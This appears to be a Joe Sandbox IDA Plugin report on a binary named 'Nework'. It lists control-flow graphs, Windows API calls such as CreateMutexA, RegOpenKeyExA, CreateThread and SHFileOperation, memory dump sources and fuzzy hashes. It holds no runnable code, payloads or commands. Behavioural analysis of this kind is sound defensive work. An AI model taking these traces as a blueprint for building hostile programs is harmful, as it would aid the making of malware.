                                                                            • Opcode Fuzzy Hash: 2946138b09b432e576e8ad3acedbe078521cce69ca4e6310ef6814e55b228b78
                                                                            • Instruction Fuzzy Hash: 1F12CF71A001089BEF08DFA8CD95BEDBBB6EF59304F64411CE845A7282D735EA84CBD1

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1154 1a6b90-1a6ba5 call 19a7d0 call 19cc90 call 19d520 1160 1a6baa-1a6bb4 CreateThread call 1a4e20 call 195f30 1154->1160 1166 1a6b80-1a6b87 Sleep 1160->1166 1166->1166
                                                                            APIs
                                                                              • Part of subcall function 00199760: Sleep.KERNELBASE(00000064), ref: 0019A7D3
                                                                              • Part of subcall function 00199760: CreateMutexA.KERNELBASE(00000000,00000000,001F3224), ref: 0019A7F1
                                                                              • Part of subcall function 00199760: GetLastError.KERNEL32 ref: 0019A7F9
                                                                              • Part of subcall function 00199760: GetLastError.KERNEL32 ref: 0019A80A
                                                                              • Part of subcall function 00195B20: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0019608D
                                                                            • CreateThread.KERNEL32(00000000,00000000,001A6AD0,00000000,00000000,00000000), ref: 001A6B70
                                                                            • Sleep.KERNEL32(00007530), ref: 001A6B85
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateErrorLastSleep$MutexOpenThread
                                                                            • String ID:
                                                                            • API String ID: 2377761554-0
                                                                            • Opcode ID: 60c0f07c781060a24c3b5291c9c97a96500633aece3228706416acb34269740e
                                                                            • Instruction ID: 1922a404b1fb97a6b4f7467a74b282f750a1ee2a7422a2c25824e00245f8ba00
                                                                            • Opcode Fuzzy Hash: 60c0f07c781060a24c3b5291c9c97a96500633aece3228706416acb34269740e
                                                                            • Instruction Fuzzy Hash: 81E08C39795304ABE62133E02C07F5D7A156F2ABA1F690100F3692E0D29BE4348092FB

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1167 19cfa9-19cfda GetModuleFileNameA 1168 19cfe1-19cfe6 1167->1168 1168->1168 1169 19cfe8-19d042 call 1a7f20 call 1a7860 call 195b20 call 19c8d0 1168->1169 1178 19d05b-19d076 call 1a8da0 1169->1178 1179 19d044-19d04f 1169->1179 1183 19d078-19d0eb call 1a8080 1178->1183 1180 19d051 1179->1180 1181 19d053-19d059 1179->1181 1180->1181 1181->1183 1187 19d0ed 1183->1187 1188 19d0ef-19d110 call 1a92d0 1183->1188 1187->1188 1191 19d141-19d169 1188->1191 1192 19d112-19d121 1188->1192 1195 19d16b-19d17a 1191->1195 1196 19d19a-19d1c2 1191->1196 1193 19d123-19d131 1192->1193 1194 19d137-19d13e call 1ad4c4 1192->1194 1193->1194 1197 19d3cc call 1c6aca 1193->1197 1194->1191 1199 19d17c-19d18a 1195->1199 1200 19d190-19d197 call 1ad4c4 1195->1200 1201 19d1f3-19d21b 1196->1201 1202 19d1c4-19d1d3 1196->1202 1216 19d3d1-19d498 call 1c6aca call 1990a0 call 1a7860 call 195b20 call 1a8080 call 1a7860 call 195b20 call 1a7860 call 195b20 call 195df0 1197->1216 1199->1197 1199->1200 1200->1196 1203 19d21d-19d22c 1201->1203 1204 19d24c-19d26e 1201->1204 1208 19d1e9-19d1f0 call 1ad4c4 1202->1208 1209 19d1d5-19d1e3 1202->1209 1211 19d22e-19d23c 1203->1211 1212 19d242-19d249 call 1ad4c4 1203->1212 1213 19d29b-19d2a2 1204->1213 1214 19d270-19d27b 1204->1214 1208->1201 1209->1197 1209->1208 1211->1197 1211->1212 1212->1204 1217 19d338-19d341 1213->1217 1218 19d2a8-19d330 call 1a7f20 * 2 call 1a7860 * 2 call 19b010 1213->1218 1221 19d27d-19d28b 1214->1221 1222 19d291-19d298 call 1ad4c4 1214->1222 1270 19d49a-19d4a6 1216->1270 1271 19d4c2-19d4da 1216->1271 1226 19d36e-19d377 1217->1226 1227 19d343-19d352 1217->1227 1260 19d335 1218->1260 1221->1197 1221->1222 1222->1213 1235 19d379-19d388 1226->1235 1236 19d3a4-19d3c1 call 1ace51 1226->1236 1232 19d364-19d36b call 1ad4c4 1227->1232 1233 19d354-19d362 1227->1233 1232->1226 1233->1216 1233->1232 1237 19d39a-19d3a1 call 1ad4c4 1235->1237 1238 19d38a-19d398 1235->1238 1237->1236 1238->1216 1238->1237 1260->1217 1272 19d4b8-19d4bf call 1ad4c4 1270->1272 1273 19d4a8-19d4b6 1270->1273 1274 19d4dc-19d4e8 1271->1274 1275 19d504-19d513 1271->1275 1272->1271 1273->1272 1276 19d514-19d519 call 1c6aca 1273->1276 1278 19d4fa-19d501 call 1ad4c4 1274->1278 1279 19d4ea-19d4f8 1274->1279 1278->1275 1279->1276 1279->1278
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0019CFB7
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileModuleName
                                                                            • String ID:
                                                                            • API String ID: 514040917-0
                                                                            • Opcode ID: 2d626be2b97f49bce6baf264bcf94e6946102532e9fac32816117d0d80f8965c
                                                                            • Instruction ID: 5d15661ad5962bf8dab00dfc25eedbeeff5b6f1dae86a82046c50235ddd9eaa2
                                                                            • Opcode Fuzzy Hash: 2d626be2b97f49bce6baf264bcf94e6946102532e9fac32816117d0d80f8965c
                                                                            • Instruction Fuzzy Hash: A0E13971A002489BEF19DB38DD597EDBB71AF56304F5082CCE4096B3C2DB759B848B92

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1285 19d520-19d78d call 19c8d0 call 1a7860 call 195b20 call 1a84e0 call 1a8080 GetModuleFileNameA 1300 19d790-19d795 1285->1300 1300->1300 1301 19d797-19d96b call 1a7f20 call 1a92d0 1300->1301 1309 19d96d-19d97c 1301->1309 1310 19d99c-19d9b9 call 1ace51 1301->1310 1311 19d97e-19d98c 1309->1311 1312 19d992-19d999 call 1ad4c4 1309->1312 1311->1312 1314 19da1b-19da20 call 1c6aca 1311->1314 1312->1310
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2888b5988b0fdec639096e7fe3f9670ae0b0c988e70ba1b08d6c03a7a9a9ff71
                                                                            • Instruction ID: 2b2c191f3db10ffb2bcd3a049324ee004a42747f6dd34feb2403a9fd2cf98b1d
                                                                            • Opcode Fuzzy Hash: 2888b5988b0fdec639096e7fe3f9670ae0b0c988e70ba1b08d6c03a7a9a9ff71
                                                                            • Instruction Fuzzy Hash: 2851CC709042689FEF25DB24CC98BEEBBB1AB1A304F5041D8D44867282DB755FC8CF91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1320 19c740-19c77d 1321 19c77f-19c795 1320->1321 1322 19c797-19c7a5 1320->1322 1323 19c7ac-19c7b9 1321->1323 1322->1323 1324 19c7a7 call 1a8c40 1322->1324 1325 19c7bb-19c7d1 1323->1325 1326 19c7d3-19c7e1 1323->1326 1324->1323 1327 19c7e8-19c83c SHFileOperation 1325->1327 1326->1327 1328 19c7e3 call 1a8c40 1326->1328 1329 19c83e-19c84a 1327->1329 1330 19c866-19c87e 1327->1330 1328->1327 1331 19c85c-19c863 call 1ad4c4 1329->1331 1332 19c84c-19c85a 1329->1332 1333 19c8a8-19c8c3 call 1ace51 1330->1333 1334 19c880-19c88c 1330->1334 1331->1330 1332->1331 1335 19c8c4-19c8c9 call 1c6aca 1332->1335 1337 19c89e-19c8a5 call 1ad4c4 1334->1337 1338 19c88e-19c89c 1334->1338 1337->1333 1338->1335 1338->1337
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c55a35fd7e0ffc6b421807122269c63303d1ee165db0fd4d5337f2e393d5c555
                                                                            • Instruction ID: 7e2d1fe5c2aad10755f01e64e457d52c8a3e641ed9f9d1cb11a0d9ab6c8cc65a
                                                                            • Opcode Fuzzy Hash: c55a35fd7e0ffc6b421807122269c63303d1ee165db0fd4d5337f2e393d5c555
                                                                            • Instruction Fuzzy Hash: F0316D31A10248AFDF08DFA8C985BEEBBB6FF49704F504619F815A7281D775E980CB90

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1346 1caa43-1caa69 call 1ca819 1349 1caa6b-1caa7d call 1d188c 1346->1349 1350 1caac2-1caac5 1346->1350 1352 1caa82-1caa87 1349->1352 1352->1350 1353 1caa89-1caac1 1352->1353
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __wsopen_s
                                                                            • String ID:
                                                                            • API String ID: 3347428461-0
                                                                            • Opcode ID: e1ef82b6c23f32661d54ea82156f1c12a23fd3d0fd1a21b694a3f878eb653c6a
                                                                            • Instruction ID: 58760ee13a90b1ee5b873fcc06f9493fd5cf753f61dc00251a33964131a4edb7
                                                                            • Opcode Fuzzy Hash: e1ef82b6c23f32661d54ea82156f1c12a23fd3d0fd1a21b694a3f878eb653c6a
                                                                            • Instruction Fuzzy Hash: 11111875A0420AAFCB06DF58E941E9A7BF5EF48308F054059F809AB251D731ED15CB65
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
                                                                            • Instruction ID: 663b9669acba6b7f5cc25b882d1b15f660e771e6d67ccdb79215ed4c9a4dd3c7
                                                                            • Opcode Fuzzy Hash: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
                                                                            • Instruction Fuzzy Hash: 43012C72C00159BFCF02EFA89D01AEEBFB5AF18310F14416AF914A2251E731CA20EB91
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,001D1955,?,?,00000000,?,001D1955,00000000,0000000C), ref: 001D1582
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: a6a370f02806502358d4cdb0eda7adc5707806d609459a61d4ee35b564d22f20
                                                                            • Instruction ID: 5940f2aefd564ed63a7cdc7ef6f0bbf0d5f761577a864e5e4b19fbc8dc02fcb6
                                                                            • Opcode Fuzzy Hash: a6a370f02806502358d4cdb0eda7adc5707806d609459a61d4ee35b564d22f20
                                                                            • Instruction Fuzzy Hash: A1D06C3201014DBBDF028F84DC46EDE3BAAFB4C714F014100FA1856020C772E8A1AB90
                                                                            APIs
                                                                            • GetFileAttributesA.KERNELBASE(?), ref: 00198629
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 22f08fd6fd80d1a032583c0aefafd594ad0c9b57767944427b0c74bec54b3160
                                                                            • Instruction ID: efd322e85f925f63e48bcf43a158095c605beb0a642efaa29f3afd47bf12ccb4
                                                                            • Opcode Fuzzy Hash: 22f08fd6fd80d1a032583c0aefafd594ad0c9b57767944427b0c74bec54b3160
                                                                            • Instruction Fuzzy Hash: 92C08C300016000AEE1C0A386A980A833029A873F97D81BC9F0718E0F1CB3D5887D700
                                                                            APIs
                                                                            • GetFileAttributesA.KERNELBASE(?), ref: 00198629
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 158e11a8166edd8e2666ee9d5fe9f74334524920b28f8b13fc29ec8c50e34cdb
                                                                            • Instruction ID: 781a49365933df1029bfbf559f0c1ed57061e49c9ace54842c52cbf04bbad028
                                                                            • Opcode Fuzzy Hash: 158e11a8166edd8e2666ee9d5fe9f74334524920b28f8b13fc29ec8c50e34cdb
                                                                            • Instruction Fuzzy Hash: 07C080300011004BDE1C4B3866580243311DA433693E40B8DF0318E0F1CB3AC443C710
                                                                            APIs
                                                                              • Part of subcall function 001B2B5C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 001B2B6F
                                                                            • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 001B1474
                                                                              • Part of subcall function 001B2C6F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 001B2C99
                                                                              • Part of subcall function 001B2C6F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 001B2D08
                                                                            • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 001B15A6
                                                                            • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 001B1606
                                                                            • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 001B1612
                                                                            • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 001B164D
                                                                            • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 001B166E
                                                                            • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 001B167A
                                                                            • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 001B1683
                                                                            • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 001B169B
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                            • String ID:
                                                                            • API String ID: 2508902052-0
                                                                            • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                            • Instruction ID: 0b7cec64787836f0520ea9128dbe135ce0fabec369e7e314b1f95f992fceb01a
                                                                            • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                            • Instruction Fuzzy Hash: AC815C71E00225AFCB19DFA9C5A09BDB7B6FF89304B5646ADE406A7705C770ED42CB80
                                                                            APIs
                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BEAE1
                                                                              • Part of subcall function 001B8D8F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 001B8DB0
                                                                            • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 001BEB47
                                                                            • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 001BEB5F
                                                                            • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 001BEB6C
                                                                              • Part of subcall function 001BE60F: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 001BE637
                                                                              • Part of subcall function 001BE60F: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 001BE6CF
                                                                              • Part of subcall function 001BE60F: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 001BE6D9
                                                                              • Part of subcall function 001BE60F: Concurrency::location::_Assign.LIBCMT ref: 001BE70D
                                                                              • Part of subcall function 001BE60F: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 001BE715
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                            • String ID:
                                                                            • API String ID: 2363638799-0
                                                                            • Opcode ID: c3deb9db64fa37085b00643d6f0dc9ec229c6a40544ee29cd51d2e735bc4a113
                                                                            • Instruction ID: 68cbc823520d70babca9e0393939d81bbd15630fc92091ead7b8333dd0b5293c
                                                                            • Opcode Fuzzy Hash: c3deb9db64fa37085b00643d6f0dc9ec229c6a40544ee29cd51d2e735bc4a113
                                                                            • Instruction Fuzzy Hash: 6E519131A002059BCF29DF50C989FEDBBB5AF59310F1540A9E9067B392CB71AE45CBA1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$InformationTimeZone
                                                                            • String ID:
                                                                            • API String ID: 597776487-0
                                                                            • Opcode ID: 840aa07ee4379f2eafad49e0a4fce14c445609aa9ebf7e716d3d82572980541f
                                                                            • Instruction ID: 7e77236b008290b63510ee4b6ee8a56d31fc79cb508dfb36d207af7902b1f2d0
                                                                            • Opcode Fuzzy Hash: 840aa07ee4379f2eafad49e0a4fce14c445609aa9ebf7e716d3d82572980541f
                                                                            • Instruction Fuzzy Hash: 5CC13671A00209AFDB249F68DC41BBA7BB9AF75314F24019BE865D7341EB34DE45CB50
                                                                            APIs
                                                                            • NtFlushProcessWriteBuffers.NTDLL ref: 001ACA0A
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: BuffersFlushProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 2982998374-0
